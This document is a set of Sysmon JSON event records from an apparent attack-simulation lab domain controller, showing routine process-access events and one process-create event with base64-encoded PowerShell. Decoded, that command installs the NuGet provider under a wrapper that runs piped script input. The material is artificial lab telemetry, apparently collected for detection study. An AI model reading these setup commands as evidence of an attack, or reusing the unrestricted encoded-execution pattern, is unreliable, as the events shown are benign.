C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-0010AC970600}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-0010AC970600}","TargetProcessId":"3220","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.375\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nProcessId: 3216\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nParentProcessId: 1576\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.375","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","ParentProcessId":"1576","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nSourceProcessId: 1576\r\nSourceThreadId: 3960\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44578890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","SourceProcessId":"1576","SourceThreadId":"3960","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001069990600}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44578890)","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001069990600}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
